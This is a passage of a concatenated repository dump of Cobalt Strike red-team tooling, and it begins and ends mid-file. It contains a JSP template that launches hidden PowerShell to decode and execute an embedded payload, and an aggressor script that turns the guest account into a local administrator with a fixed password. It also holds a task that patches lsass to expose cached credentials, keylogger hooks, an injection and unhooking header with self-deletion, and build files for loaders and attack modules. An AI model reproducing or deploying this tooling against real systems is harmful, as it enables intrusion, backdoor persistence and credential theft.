keylognow($1, { 17 | bkeylogger($1, $2, $3); 18 | }); 19 | } -------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/SOURCE/StartWebClient.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | //ADVAPI32 6 | DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventRegister(LPCGUID ProviderId, PENABLECALLBACK EnableCallback, PVOID CallbackContext, PREGHANDLE RegHandle); 7 | DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventWrite(REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData); 8 | DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventUnregister(REGHANDLE RegHandle); 9 | -------------------------------------------------------------------------------- /Cobatl Strike/DllComHijacking/dllcomhijacking.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //InstantiateCOMObject 4 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit); 5 | DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void); 6 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, COSERVERINFO *pServerInfo, DWORD dwCount, MULTI_QI *pResults); 7 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid); -------------------------------------------------------------------------------- /Loader/Titan Ldr/hooks/DnsQuery_A.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Redirects DnsQuery_A over a DNS/HTTP(s) 18 | * provider. 19 | * 20 | !*/ 21 | 22 | D_SEC( D ) DNS_STATUS WINAPI DnsQuery_A_Hook( _In_ PCSTR pszName, _In_ WORD wType, _In_ DWORD Options, _In_ PVOID pExtra, _Out_ PDNS_RECORD * ppQueryResults, _In_ PVOID pReserved ); 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/args.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | typedef struct 4 | { 5 | PAPI pApi; 6 | PCHAR pPipeName; 7 | PCHAR pDesktopName; 8 | SHORT port; 9 | HANDLE log; 10 | ULONG_PTR gdiplusToken; 11 | COLORREF color; 12 | ULONG quality; 13 | HDESK hDesktop; 14 | BITMAPINFO bmpInfo; 15 | PBYTE pPixels; 16 | PBYTE pOldPixels; 17 | PBYTE pTempPixels; 18 | 19 | } ARGS, *PARGS; 20 | -------------------------------------------------------------------------------- /Cobatl Strike/offsecginger/custom_payload_generator/templates/jsp_template.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.io.*" %> 2 | <% 3 | try { 4 | Process p = Runtime.getRuntime().exec("powershell -exec bypass -noni -nop -c \"$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('%%DATA%%'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\""); 5 | } 6 | catch(IOException e) { 7 | e.printStackTrace(); 8 | } 9 | %> 10 | 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Venoma/Kobra/Ven.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | // Functions definitions 6 | std::vector Download(LPCWSTR baseAddress, LPCWSTR filename); 7 | DWORD GetPID(); 8 | void fresh_unhooking(); 9 | void perunsfart_unhooking(); 10 | void evt_patch(); 11 | 12 | void EnumPageExec(); 13 | void Indirect_RawExec_ppid(DWORD exPID); 14 | void IndirectAPC(); 15 | void IndirectRemoteAPC(DWORD exPID); 16 | void execArtifact(DWORD exPID); 17 | 18 | BOOL DeleteSelf(); 19 | 20 | 21 | -------------------------------------------------------------------------------- /Profile/Malleable Profiles/rich_header.py: -------------------------------------------------------------------------------- 1 | #rich header 2 | 3 | import random 4 | 5 | def generate_junk_assembly(length): 6 | return ''.join([chr(random.randint(0, 255)) for _ in range(length)]) 7 | 8 | def generate_rich_header(length): 9 | rich_header = generate_junk_assembly(length) 10 | rich_header_hex = ''.join([f"\\x{ord(c):02x}" for c in rich_header]) 11 | return rich_header_hex 12 | 13 | #generate a number of assembly opcodes (4-byte aligned) 14 | print(generate_rich_header(random.randint(5,20) * 4)) 15 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF RunPe/Makefile: -------------------------------------------------------------------------------- 1 | #Makefile 2 | 3 | CCX64 = x86_64-w64-mingw32-gcc 4 | LDX64 = x86_64-w64-mingw32-ld 5 | 6 | CFLAGS = -w -Os -s -m64 -masm=intel -fno-builtin -fno-jump-tables 7 | 8 | TEMP_PATH = Bin/temp 9 | 10 | draugr: 11 | @ nasm -f win64 Src/Stub.s -o $(TEMP_PATH)/Stub.o 12 | @ $(CCX64) -c Src/Bof.c $(CFLAGS) -o $(TEMP_PATH)/Bof.o 13 | @ $(CCX64) -c Src/Draugr.c $(CFLAGS) -o $(TEMP_PATH)/Draugr.o 14 | @ $(LDX64) --allow-multiple-definition -r $(TEMP_PATH)/*.o -o Bin/runpe.o 15 | @ echo "[*] BOF Ready " 16 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Titan.cna: -------------------------------------------------------------------------------- 1 | ## 2 | ## Reflective Loader 3 | ## 4 | ## GuidePoint Security LLC 5 | ## 6 | ## Threat and Attack Simulation 7 | ## 8 | 9 | ## 10 | ## Inserts titan into Beacon 11 | ## 12 | set BEACON_RDLL_GENERATE { 13 | 14 | $hnd = openf( script_resource( "Titan.". $3 .".bin" ) ); 15 | $ldr = readb( $hnd, -1 ); 16 | closef( $hnd ); 17 | 18 | if ( strlen( $ldr ) == 0 ) { 19 | warn( 'titan has not been compiled, using standard cobalt loader.' ); 20 | return $null; 21 | }; 22 | 23 | return $ldr . $2; 24 | }; 25 | -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/headers/exploit_checks/CVE_2020_0796.h: -------------------------------------------------------------------------------- 1 | //https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 2 | void CVE_2020_0796() { 3 | int osRID = osReleaseId(); 4 | 5 | if ((osRID == 1903) or (osRID == 1909)) { 6 | if (std::find(installedUpdates.begin(), installedUpdates.end(), "4551762") == installedUpdates.end()) { 7 | std::cout << "\n\t [!] Vulnerable for CVE-2020-0796 (SMBGhost) Windows SMBv3 Client/Server Remote Code Execution Vulnerability" << "\n"; 8 | } 9 | } 10 | } -------------------------------------------------------------------------------- /Loader/Titan Ldr/python3/hashstring.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | import sys 4 | 5 | def hash_string( string ): 6 | try: 7 | hash = 5381 8 | 9 | for x in string.upper(): 10 | hash = (( hash << 5 ) + hash ) + ord(x) 11 | 12 | return hash & 0xFFFFFFFF 13 | except: 14 | pass 15 | 16 | if __name__ in '__main__': 17 | try: 18 | print('0x%x' % hash_string(sys.argv[1])); 19 | except IndexError: 20 | print('usage: %s [string]' % sys.argv[0]); 21 | -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Killer/DetailForm.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Linq; 7 | using System.Text; 8 | using System.Threading.Tasks; 9 | using System.Windows.Forms; 10 | 11 | namespace BeaconKiller 12 | { 13 | public partial class Detail : Form 14 | { 15 | public Detail(string detail) 16 | { 17 | InitializeComponent(); 18 | textBox.Text = detail; 19 | } 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Psw/Psw.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | beacon_command_register("psw", "Show Window titles from processes with active Windows.", 5 | "Synopsis: psw\n\n" . 6 | "Show Window titles from processes with active Windows.\n\n"); 7 | 8 | alias psw { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("Psw." . barch($bid) . ".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/WdToggle/WdToggle_bof.s1.py: -------------------------------------------------------------------------------- 1 | from typing import List, Tuple 2 | 3 | from outflank_stage1.implant import ImplantArch 4 | from outflank_stage1.task.base_bof_task import BaseBOFTask 5 | from outflank_stage1.task.enums import BOFArgumentEncoding 6 | 7 | 8 | class WdToggleBOF(BaseBOFTask): 9 | def __init__(self): 10 | super().__init__("WdToggle", supported_architectures=[ImplantArch.INTEL_X64]) 11 | self.parser.description = "Patch lsass to enable WDigest credential caching and to circumvent Credential Guard (if enabled)." 12 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Auto/auto-sleep-after-initial-access.cna: -------------------------------------------------------------------------------- 1 | #Author: @nickvourd 2 | on beacon_initial { 3 | local('$bid'); 4 | $bid = $1; 5 | 6 | #Change your sleep time according to your preference 7 | #bsleep Arguments: 8 | #$1 - the ID for the beacon. This may be an array or a single ID. 9 | #$2 - the number of seconds between beacons. 10 | #$3 - the jitter factor [0-99] 11 | bsleep($1, 130, 10); 12 | 13 | blog($1, "Setting sleep interval to 2 minutes 10 seconds with 10% jitter"); 14 | } 15 | -------------------------------------------------------------------------------- /threatexpress/beacon_webview/notes.md: -------------------------------------------------------------------------------- 1 | # D3 Notes 2 | 3 | Arrows and Labels 4 | 5 | http://bl.ocks.org/fancellu/2c782394602a93921faff74e594d1bb1 6 | https://gist.github.com/satomacoto/3384995 7 | 8 | 9 | D3 force simulation, curved edges and hover interaction (Data: Twitter mentions between members of the Welsh Assembly) 10 | 11 | https://bl.ocks.org/martinjc/7aa53c7bf3e411238ac8aef280bd6581 12 | 13 | 14 | Tooltips 15 | 16 | http://www.d3noob.org/2013/01/adding-tooltips-to-d3js-graph.html 17 | 18 | Font Awesome 19 | 20 | https://fontawesome.com/cheatsheet -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/guest-to-admin.cna: -------------------------------------------------------------------------------- 1 | sub guest_local_admin { 2 | #enable account 3 | bshell($1, 'net user guest /active:yes'); 4 | 5 | #set guest's password to CCDCsAccount99 6 | bshell($1, 'net user guest CCDCsAccount99'); 7 | 8 | #add guest to local administrators group 9 | bshell($1, 'net localgroup administrators guest /add'); 10 | } 11 | 12 | popup beacon_top { 13 | item "Guest Acct Local Admin" { 14 | local('$bid'); 15 | foreach $bid ($1) { 16 | guest_local_admin($bid); 17 | } 18 | } 19 | } -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/def_file_gen/cmon.py: -------------------------------------------------------------------------------- 1 | with open("./all.h") as fh: 2 | for l in fh.readlines(): 3 | l=l.strip("\n").replace("\t", " ") 4 | 5 | # ignore comments and empty lines 6 | if (not len(l) or l[0] == "/"): 7 | continue 8 | 9 | # DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen); 10 | 11 | f = l.split("(")[0].strip().split(" ")[-1] 12 | c = f.split("$")[1] 13 | print(f"{c}\t{f}\t{l}") 14 | 15 | 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Sharp Zero Logon/SharpZeroLogon.csproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | fr-FR 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) UINT32 HashString( PVOID buffer, ULONG size ); 4 | SECTION( E ) PVOID FindModule( ULONG hash, PPEB peb, PULONG size ); 5 | SECTION( E ) VOID LdrProcessIat( PVOID image, PVOID directory ); 6 | SECTION( E ) VOID LdrProcessRel( PVOID image, PVOID directory, PVOID imageBase ); 7 | SECTION( E ) VOID LdrHookImport( PVOID image, PVOID directory, ULONG hash, PVOID function ); 8 | SECTION( E ) PVOID FindFunction( PVOID image, ULONG hash ); 9 | SECTION( E ) PVOID FindGadget( LPBYTE module, ULONG size ); 10 | 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/app_count/Makefile: -------------------------------------------------------------------------------- 1 | CC_x64=x86_64-w64-mingw32-gcc 2 | CC_x86=i686-w64-mingw32-gcc 3 | CFLAGS=-c -fno-builtin -fno-builtin-memset -fno-builtin-memcpy -fno-builtin-memmove -fno-asynchronous-unwind-tables -fno-unwind-tables -fno-stack-protector -fno-stack-check -mno-stack-arg-probe -Os 4 | 5 | TARGET := applications_enum 6 | 7 | all: $(TARGET).x86.o $(TARGET).x64.o 8 | 9 | $(TARGET).x86.o: $(TARGET).c 10 | $(CC_x86) $(CFLAGS) -o $@ $< 11 | 12 | $(TARGET).x64.o: $(TARGET).c 13 | $(CC_x64) $(CFLAGS) -o $@ $< 14 | 15 | clean: 16 | rm -f *.o 17 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "macros.h" 10 | #include "../shared/native.h" 11 | #include "../shared/config.h" 12 | #include "hashes.h" 13 | #include "bapi.h" 14 | #include "util.h" 15 | #include "bfmain.h" 16 | #include "api.h" 17 | #include "args.h" 18 | #include "types.h" 19 | #include "scmain.h" 20 | #include "pipe.h" 21 | 22 | extern ULONG_PTR GetIp( VOID ); 23 | extern ULONG_PTR Leave( VOID ); 24 | -------------------------------------------------------------------------------- /Cobatl Strike/Psc/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psk/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psm/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psw/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psx/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/morph HTA/banner.txt: -------------------------------------------------------------------------------- 1 | ███╗ ███╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██╗████████╗ █████╗ 2 | ████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██║ ██║ ██║ ██║╚══██╔══╝██╔══██╗ 3 | ██╔████╔██║██║ ██║██████╔╝██████╔╝███████║█████╗███████║ ██║ ███████║ 4 | ██║╚██╔╝██║██║ ██║██╔══██╗██╔═══╝ ██╔══██║╚════╝██╔══██║ ██║ ██╔══██║ 5 | ██║ ╚═╝ ██║╚██████╔╝██║ ██║██║ ██║ ██║ ██║ ██║ ██║ ██║ ██║ 6 | ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ 7 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #pragma warning(disable:4996) 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /Cobatl Strike/Askcreds/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/KerbHash/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Klist/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Lapsdump/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/ReconAD/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Smbinfo/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/SprayAD/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Winver/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Common.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /* Include core defs */ 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include "Native.h" 19 | #include "Macros.h" 20 | 21 | /* Include Library */ 22 | #include "Labels.h" 23 | #include "Hash.h" 24 | #include "Peb.h" 25 | #include "Ldr.h" 26 | #include "Pe.h" 27 | 28 | /* Include Hooks! */ 29 | #include "hooks/DnsQuery_A.h" 30 | -------------------------------------------------------------------------------- /Cobatl Strike/Domaininfo/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/FindObjects/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Kerberoast/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) 